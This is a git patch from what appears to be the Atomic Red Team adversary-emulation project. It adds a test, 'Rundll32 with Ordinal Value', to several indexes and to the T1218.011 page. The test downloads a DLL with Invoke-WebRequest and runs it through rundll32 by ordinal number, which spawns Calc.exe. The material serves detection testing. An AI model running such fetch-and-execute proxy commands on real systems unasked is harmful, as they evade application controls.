From 9e92f29f6bf0e8f2c12db0b68684fee00bc855d4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 8 Feb 2022 17:38:57 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 33 ++++++++++++- atomics/T1218.011/T1218.011.md | 49 +++++++++++++++++++ 6 files changed, 85 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5ae1b775..2816134b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -545,6 +545,7 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell +defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f02d0529..8af9c350 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -371,6 +371,7 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell +defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fd14f63c..ba0c1d26 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -860,6 +860,7 @@ - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] + - Atomic Test #10: Rundll32 with Ordinal Value [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index be0fab5e..67f8c56b 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -612,6 +612,7 @@ - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] + - Atomic Test #10: Rundll32 with Ordinal Value [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 84705ffa..26fd893d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -36438,7 +36438,38 @@ defense-evasion: ' executor: name: powershell - command: 'rundll32.exe #{input_file}, StartW' + command: 'rundll32.exe #{input_file}, StartW + +' + - name: Rundll32 with Ordinal Value + auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 + description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. + \nUpon successful execution, Calc.exe will spawn.\n" + supported_platforms: + - windows + input_arguments: + input_url: + description: Url to download the DLL + type: Url + default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll + input_file: + description: DLL File + type: String + default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll + dependency_executor_name: powershell + dependencies: + - description: 'DLL file must exist on disk at specified location + +' + prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" + +' + executor: + name: command_prompt + command: 'rundll32.exe #{input_file},#2' T1134.005: technique: external_references: diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 11b5f6de..9d1536a0 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -26,6 +26,8 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don - [Atomic Test #9 - Execution of non-dll using rundll32.exe](#atomic-test-9---execution-of-non-dll-using-rundll32exe) +- [Atomic Test #10 - Rundll32 with Ordinal Value](#atomic-test-10---rundll32-with-ordinal-value) +
@@ -400,4 +402,51 @@ Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" +
+
+ +## Atomic Test #10 - Rundll32 with Ordinal Value +Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. +Upon successful execution, Calc.exe will spawn. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll| +| input_file | DLL File | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +rundll32.exe #{input_file},#2 +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: DLL file must exist on disk at specified location +##### Check Prereq Commands: +```powershell +if (Test-Path #{input_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" +``` + + + +